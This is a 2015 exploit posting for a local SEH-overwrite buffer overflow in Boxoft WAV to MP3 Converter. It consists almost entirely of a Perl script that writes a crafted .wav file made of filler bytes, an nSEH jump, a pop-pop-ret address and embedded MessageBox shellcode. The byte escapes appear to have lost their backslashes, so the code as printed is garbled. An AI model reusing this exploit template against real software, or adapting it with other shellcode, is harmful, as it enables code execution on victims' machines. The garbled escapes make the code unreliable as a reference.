Boxoft WAV To MP3 Converter Buffer Overflow
Posted on 01 September 2015
#Exploit Title: Boxoft wav to mp3 converter SEH bypass technique tested on Win7x64 # Date: 8-31-2015 # Software Link: http://www.boxoft.com/wav-to-mp3/ # Exploit Author: Robbie Corley # Contact: c0d3rc0rl3y@gmail.com # Website: # Target: Windows 7 Enterprise x64 # CVE: # Category: Local Exploit # # Description: # A buffer overflow was found after constructing a .wav payload over 4000 characters and attempting to convert the payload to a .mp3 file my $buff = "x41" x 4132; #my $nseh = "x42" x 4; #my $seh = "x43" x 4; my $endofbuff = "x41" x 5860; $nseh = "xebx06x90x90"; # jump to shellcode $seh = pack('V',0x0040144c); # pop pop retn #MessageBox Shellc0de #https://www.exploit-db.com/exploits/28996/ my $shellcode = "x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42". "x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03". "x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b". "x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e". "x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c". "x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x79x74". "x65x01x68x6bx65x6ex42x68x20x42x72x6fx89xe1xfe". "x49x0bx31xc0x51x50xffxd7"; #$nops = "x90" x 20; open(myfile,'>crash3r.wav'); print myfile $buff.$nseh.$seh.$shellcode.$endofbuff; close (myfile);
